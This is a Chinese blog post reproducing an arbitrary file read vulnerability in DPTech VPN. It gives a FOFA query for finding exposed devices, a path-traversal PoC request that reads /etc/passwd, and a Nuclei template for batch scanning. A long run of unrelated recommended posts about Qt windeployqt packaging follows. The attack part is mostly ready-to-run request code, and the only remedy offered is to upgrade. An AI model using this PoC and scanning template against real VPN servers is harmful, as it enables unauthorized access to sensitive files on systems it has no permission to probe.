漏洞复现--迪普DPTech VPN 任意文件读取

最新推荐文章于 2025-03-19 16:48:57 发布
最新推荐文章于 2025-03-19 16:48:57 发布
阅读量2k 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_53003652/article/details/134420311
版权

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

一:漏洞描述

杭州迪普科技股份有限公司DPTech VPN 存在任意文件读取漏洞,攻击者可以构造恶意请求,通过漏洞读取服务器上的任意文件。

二:漏洞影响版本

DPTech VPN

三:网络空间测绘查询

fofa:
cert="DPtechCa"
image.png

四:漏洞复现

image.png
POC:

GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1

image.png
image.png

五:批量检测


id: dptech-vpn-fileread

info:
  name: dp-vpn-fileread
  author: rain
  severity: high
  description: DPtech SSL VPN 服务存在一个文件读取漏洞,攻击者可以通过利用此漏洞读取目标系统上的敏感文件。该漏洞可能导致未经授权的信息泄露,危及系统的机密性和完整性。
  metadata: 
    fofa-query: title=="SSL VPN Service" && header="Dptech" || cert="DPtechCa"

http:
  - raw:
      - |     
        GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200 && contains_all(body,"root")'

image.png

六:修复建议

升级到最新版本

使用Qt自带windeployqt工具打包exe后,依旧提示无法执行程序的解决方案
让他让的博客
01-12 2578
为了让我们开发的Qt 的应用程序可以在别人无Qt环境的电脑下运行,就得提供程序需要的dll等库。 windeployqt能自动为我们找到并且添加,网上有很多关于这个工具的用法,这里记录几个要点 使用对应编译工具bin目录下的windeployqt,可能我们电脑里有多个windeployqt, 比如我使用vs2013 64bit,那么就在msvc2013_64_opengl\bin\windeployqt, 于是在cmd执行cd 到test.exe的目录, 然后D:\Qt5.4.1\5.4\msvc2
QT打不开生成好的exe文件 由于找不到Qt5Guid.dll等问题
SS_SS_SSS_SSS的博客
03-10 4311
1.先将QT左下方的Debug改为Release运行; 2.然后找生成目录里的exe文件,复制exe文件 3.把复制的exe文件放进一个新建文件夹中LG(任取名) 4.打开命令行 5.输入cd +文件目录名(刚新建的文件目录) 6.然后输入 windeployqt +exe文件名 7.回到之前建的文件夹,缺少的文件都已补充,即可成功运行exe文件 参考文献:qt如何生成exe文件并运行_何朴尧的博客-优快云博客_qt生成exe文件 ...
QT项目打包发布(5.14.2)(mingw64)
qq_43708317的博客
03-19 328
如果需要进一步打包程序(比如把这个程序发个另一台电脑,另一台电脑可以像装软件一样,一直点击下一步,就像装一个软件一样),推荐使用。鼠标悬停在待拖动的.exe文件上,然后单击文件并拖动到windeployqt.exe上。3.找到QT安装的目录,按一下路径找到windeployqt.exe文件。2.1找到以下文件路径,在项目根目录下。2.找到release模式下生成的.exe文件。5.执行完第四步就会出现黑窗口命令自动执行。1.qt运行时选择release模式。到此就完成了QT项目的打包发布。
QT程序用windeployqt打包后无法正常启动
panasonicsony的博客
11-29 2391
QT程序用windeployqt打包后无法正常启动,显示“应用程序无法正常启动(0xc000007b)。请单击确定关闭应用程序。虽然依赖的dll也拷贝到exe目录,应该是该dll还依赖其他的dll,应该对该dll执行打包程序。打包后,可以看到,这个dll确实依赖了qt的其他dll,比如网络的dll。把这些dll拷贝到应用程序exe目录,重新开始程序,这次顺利启动了。查看exe程序所在文件夹,qt的关键dll都已经拷贝到了。考虑到我的程序还依赖其他的dll工程,
QT 生成exe应用程序路径找不到&无法打开
daisy.skye的博客
08-10 4684
目录 菜单栏项目窗口中设置构建目录 ​​​选择对应的项目切换构建为Release(默认Debug) 点击exe系统错误提示找不到Qt5Core.dd 使用Qt自带WinGw运行exe生成相应组件 菜单栏项目窗口中设置构建目录 本例程在D盘下创建了QT文件夹用于保存QT的项目程序,在QT文件夹中,创建了Test测试项目程序,此时需要生成Test的exe应用程序,需要在QT下新建一个terelease文件夹用于保存Test的exe相关配置文件, 注意:构建目录必须和源文件目录为同级目录,其中Te
qt windeployqt打包 带多个dll的可执行程序时 应用程序无法正常启动
u012719076的博客
12-28 1142
qt 程序打包
QT windeployqt打包后,无法使用数据库(QSqldatabase:an in stance of QCorApplication is required for loading)
m0_68811757的博客
07-24 944
release下,首次运行,提示数据库打开成功,但却无法显示数据,发现运行文件中重新创建的db,文件是空的数据库表。于是在源文件中找到有数据的数据库表,与release运行程序中的空表进行覆盖,然后运行发现能够正常显示。就剩下最后一步,发布程序了。然而,将r使用windeployqt进行打包exe时,发现数据库数量又不显示,无法使用,而且回到源文件中继续运行release,发现数据库无法使用,提示QSqldatabase:an in stance of QCorApplication is require
Qt程序打包windeployqt.exe
qq_35599937的博客
09-27 1707
Qt文件打包windeployqt.exe) 参考自: Qt程序打包——使用自带windeployqt.exe工具查找依赖库 https://blog.youkuaiyun.com/Zhenggenno_1/article/details/80459066 qt如何生成exe文件并运行 https://blog.youkuaiyun.com/qq_39054069/article/details/96481902 老师要求将作业以可运行程序的形式上交,因此就想办法将Qtexe文件打包为不依赖环境直接运行的程序。 网上的大多数
Qt 工具 windeployqt 自动打包 exe 程序
黔家仔的博客
02-21 2897
Qt 打包知识点,一定要注意 32位和64位 的区别,还有 Release 和 Debug 的区别呀,朋友~
windeployqt.exe
11-04
Qt 官方开发环境使用的动态...因此 Qt 官方开发环境里自带了一个工具:windeployqt.exe,可以自动连接dll,方便我们进行项目打包,但是有时会发现自己的qt版本中缺少这个exe,这时需要手动下载添加到mingw的bin目录下
qt应用程序IDE中可运行,但是在windeployqt后却不能运行,原因分析
m0_37922496的博客
02-17 243
qt应用程序再调试可运行,但是发布后提示 0xc000007b累类似的错误或者其他一些缺少dll包的错误,或者干脆打开没有反映。在qt的项目run的界面,检查下Path这个环境变量中是不是有路径没有包含到,和 系统的 设置—环境变量是不是不一样。一般来说要注意两个方面的东西。
QT打包部署程序时候程序无法启动
Zebar01的专栏
12-09 1207
当在Qt打包部署程序后(用windeployqt打包qt依赖库后),在本机可以运行,在其他电脑上显示程序无法启动,如下图所示。可能是在复制dll时候将System32中的dll复制到了应用程序中,应该改用SysWOW64中的dll,无论程序发布时候是用的x86还是x64,都用SysWOW64中的dll。
QT windeployqt打包出现无法正常启动问题
Zlb2214的博客
04-09 643
QT 通过windeployqt 打包后出现的问题。一般在上一级目录会有安装好的64位的MSVC工具。但是windows下运行的却是32位的。原因QT构建选择的是64位的。步骤打开32的所在路径。
qt windeployqt 打包发布程序,点击可执行文件没有反应的问题
liujianchen_linux的博客
05-30 7998
操作步骤: 1拷贝xxx.exe文件到单独的目录中 2执行windeployqt xxx.exe --qmldirF:\Qt\5.9.1\msvc2017_64\qml 3双击运行xxx.exe 现象: 没有报任何错误,也没有任何反应,但是通过任务管理器看这个进程又已经运行 然后百思不得其解;然后通过各种尝试和搜索,发现一篇文章描述了该问题,也从另一方面解决了该问题,但是没...
win系统发布Qt程序——应用程序无法正常启动(0xc000007b)
TuringEvo专栏
10-13 2397
比如我用 mingw73_64 构建的程序,就用 mingw73_64/bin/windeployqt.exe 发布程序。在 C:\Qt\Qt5.12.12\Tools\mingw730_64\bin 打开powershell。查看其下dll是x86 还是 x64 ,我用x64所以x86的dll都要换成x64版本。其中 D:\workspace\app\ 是我程序发布目录。找到这个库的x64版本复制到程序目录,再次运行解决问题。请使用对应版本的windeployqt。比如我电脑上安装有不同构建工具的QT
打包qt程序无法启动 windeployqt打包dll版本不对5.6.3版本打包的dll却是5.9.7的 ANACONDA神坑
承泓风的博客
10-28 366
昨天打包Qt程序的时候发现运行不了 首先发现是dll不对导致的,发现dll的版本是5.9.7 而我的电脑上只装了5.6.3(我以为的) ,找了半天才发现Anaconda里面自带了一个5.9.7版本的Qt Anaconda这东西在我上次打包一个python程序的时候也跑不起来,真的有点坑啊 ...
解决Qt Qml应用使用windeployqt部署后仍不能运行的问题
HLdongdong的博客
04-15 2643
问题描述 在Windows系统中官方推荐使用windeployqt使用C++开发的应用程序使用windeployqt很好用,但是使用Qml开发的应用却不能运行,双击之后一点反应也没有。 解决方法 先加后减 做加法 比如我的应用程序为app.exe,先做加法,把运行app.exe可能缺的东西全都加上来。 关闭Qt Creaator。 把app.exe放到C:\Qt\5.15.2\msvc2019_64\bin中运行,如果正常启动则继续。 将app.exe放到一个空文件夹中(比如文件夹名为:folder)。
qml关于windeplyqt打包完成后应用程序无法正常启动的报错 解决方案
sxczzZ的博客
08-12 338
必须保证你的应用程序拷贝到bin目录下是能正常启动的,如果复制过去都不能启动,那就是你程序本身有问题(是不是自己的一些依赖dll没有拷贝进来),而不是windeplyqt问题。我的qt编译器库路径是 C:\Qt\Qt5.12.11\5.12.11\mingw73_32\bin。如果你的应用程序是64位编译的,就去64位的文件夹里面拷贝。去qt编译器库里面把 libwinpthread-1.dll 拷贝到打包文件夹。总体思路是QT开头的dll有一些依赖库,lib就是依赖库。
Qt程序发布工具windeployqt.exe所带来的坑
hmwz0001的博客
06-05 769
三、发现的windeployqt.exe问题:发现这个工具把msvc2017编译器下的bin文件夹中的Qt5OpenGL.dll和Qt5Test.dll两个文件拷贝到了发布文件夹中,我用的编译器是mingw73_64,在开发机上你试不出来,因为你的系统路径中有Qt的路径,程序会根据系统路径自动查找用到的dll文件,即便是你的发布文件夹中拷贝错了,系统也能找到对应的dll文件,但是在客户端上是没有Qt环境的,所以程序就找不到需要的dll文件了,应用程序文件夹中的dll文件又是不正确的,所以就报错了!
qt 使用 msvcb编译 windeployqt 打包exe运送不起来‘
最新发布
04-02
### Qt 使用 MSVC 编译后 windeployqt 打包生成的 exe 文件无法运行的原因分析与解决方案 当使用 MSVC 编译器构建并尝试通过 `windeployqt` 工具打包时,可能会遇到生成的 `.exe` 文件无法正常运行的情况。以下是可能原因及其对应的解决方案: #### 1. **缺少必要的动态链接库 (DLL)** 如果目标计算机上未安装 Visual C++ Redistributable 或者某些依赖项缺失,则可能导致程序崩溃或无法启动。例如,“应用程序无法正常启动(0xc000007b)”错误通常是因为缺少特定版本的 Microsoft VC++ Runtime 库[^2]。 ##### 解决方法: - 确保目标机器已安装对应版本的 Visual C++ Redistributable 包。 - 如果不想让用户手动安装这些组件,可以将所需的 DLL 文件随同应用一起分发。可以通过以下方式获取所需文件列表: ```bash D:\Qt5.4.1\5.4\msvc2013_64_opengl\bin\windeployqt --list all test.exe ``` #### 2. **不匹配的架构** 另一个常见问题是编译环境和目标平台之间的架构冲突。比如,在 x86 架构的目标设备上部署了一个针对 x64 平台优化的应用程序,反之亦然。这种情况下也会引发类似的错误消息:“应用程序无法正常启动”。 ##### 解决办法: - 检查项目的配置设置以及所选 Kits 是否一致; - 对应不同体系结构重新编译整个工程,并再次运用 `windeployqt` 命令处理新的二进制输出物[^5]; #### 3. **插件路径问题** 有时即使所有的核心库都存在,但如果某些图形界面或其他功能相关的插件未能被正确复制到指定位置,也可能阻止程序加载成功。 ##### 处理措施: - 当调用 `windeployqt` 的时候加上参数 `--qmldir` 来指明 QML 文件所在的目录以便自动收集相关联的模块资源[^3]: ```bash D:\Qt5.4.1\5.4\msvc2013_64_opengl\bin\windeployqt --qmldir path_to_qml_files test.exe ``` #### 4. **其他潜在因素** 除了上述提到的内容外,还有可能存在诸如网络访问权限不足、数据库连接字符串有误等问题影响最终用户体验效果。因此建议开发者们仔细阅读调试日志寻找蛛丝马迹进一步排查具体障碍所在之处[^4]. ```python import os print(os.getcwd()) # 获取当前工作目录用于验证是否处于正确的上下文中执行命令 ``` ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值